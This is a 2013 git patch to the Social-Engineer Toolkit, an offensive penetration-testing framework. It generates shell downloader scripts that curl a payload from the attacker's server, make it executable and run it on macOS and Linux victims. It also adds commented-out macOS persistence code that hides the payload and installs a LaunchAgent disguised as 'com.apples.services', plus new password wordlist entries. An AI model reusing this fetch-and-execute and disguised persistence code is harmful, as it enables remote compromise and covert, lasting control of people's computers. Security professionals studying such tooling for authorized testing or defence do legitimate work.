From 74ee6a6fa454cfcbb3661d1dc65b41748c4d96ad Mon Sep 17 00:00:00 2001
From: TrustedSec <davek@trustedsec.com>
Date: Wed, 21 Aug 2013 17:40:05 -0400
Subject: [PATCH] SET version 5.3.3 release - many bug fixes

---
 config/set_config          |  4 +++
 readme/CHANGES             |  8 +++++
 src/core/payloadprep.py    | 71 ++++++++++++++++++++++++++++++++++----
 src/fasttrack/wordlist.txt |  3 ++
 4 files changed, 80 insertions(+), 6 deletions(-)

diff --git a/config/set_config b/config/set_config
index 9fd5859c4..7f991c199 100644
--- a/config/set_config
+++ b/config/set_config
@@ -247,6 +247,10 @@ LINUX_PAYLOAD_DELIVERY=linux/x86/meterpreter/reverse_tcp
 ### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
 CUSTOM_LINUX_OSX_PAYLOAD=OFF
 #
+#
+### THIS WILL USE A CUSTOM PLIST FOR PERSISTENCE ON OSX
+ENABLE_PERSISTENCE_OSX=OFF
+#
 ### User agent string for when using anything that clones the website, this user agent will be used
 USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
 #
diff --git a/readme/CHANGES b/readme/CHANGES
index e21243a95..17f6da24c 100644
--- a/readme/CHANGES
+++ b/readme/CHANGES
@@ -1,3 +1,11 @@
+~~~~~~~~~~~~~~~~
+version 5.3.3
+~~~~~~~~~~~~~~~~
+
+* fixed an issue that would cause the download to randomized name to work properly on OSX
+* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
+* added better stability for osx exploitation 
+
 ~~~~~~~~~~~~~~~~
 version 5.3.2
 ~~~~~~~~~~~~~~~~
diff --git a/src/core/payloadprep.py b/src/core/payloadprep.py
index aa9b806b8..7418a95ea 100644
--- a/src/core/payloadprep.py
+++ b/src/core/payloadprep.py
@@ -1,9 +1,7 @@
 #!/usr/bin/python
 ############################################
-#
 # Code behind the SET interactive shell
 # and RATTE
-#
 ############################################
 import os
 import sys
@@ -168,17 +166,78 @@ if posix == True:
     payload_flags = webserver.split(" ")
     # grab osx binary name
     osx_name = generate_random_string(10,10)
-    downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
-    filewrite.write(downloader)
+    downloader = "#!/bin/sh\ncurl -C -O http://%s/%s > /tmp/%s\nchmod +x /tmp/%s\n./tmp/%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
+    filewrite.write(downloader + "\n")
+    persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
+    if persistence == "on":
+        print "Coming soon.."
+        # modified persistence osx from http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
+        #filewrite.write(r"mkdir ~/Library/.hidden")
+        #filewrite.write("\n")
+        #filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
+        #filewrite.write("\n")
+        #filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" % (osx_name, payload_flags[1], payload_flags[2]))
+        #filewrite.write("\n")
+        #filewrite.write(r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
+        #filewrite.write("\n")
+        #filewrite.write(r"mkdir ~/Library/LaunchAgents")
+        #filewrite.write("\n")
+        #filewrite.write("echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write("echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
+        #filewrite.write("\n")
+        #filewrite.write(r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
+
     filewrite.close()
     # grab nix binary name
+    #linux_name = check_options("NIX.BIN=")
     linux_name = generate_random_string(10,10)
     downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
     filewrite = file(setdir + "/web_clone/nix.bin", "w")
     filewrite.write(downloader)
     filewrite.close()
-    shutil.copyfile("src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
-    shutil.copyfile("src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
+    shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
+    shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
+
+    # copy over the downloader scripts
+    osx_down = check_options("MAC.BIN=")
+    lin_down = check_options("NIX.BIN=")
+    shutil.copyfile(setdir + "/web_clone/nix.bin", setdir + "/web_clone/%s" % (lin_down))
+    shutil.copyfile(setdir + "/web_clone/mac.bin", setdir + "/web_clone/%s" % (osx_down))
 
 # check to see if we are using a staged approach or direct shell
 stager = check_config("SET_SHELL_STAGER=").lower()
diff --git a/src/fasttrack/wordlist.txt b/src/fasttrack/wordlist.txt
index 3d32baa73..a73c482bb 100644
--- a/src/fasttrack/wordlist.txt
+++ b/src/fasttrack/wordlist.txt
@@ -1,3 +1,6 @@
+default
+test
+testing
 password2
 
 password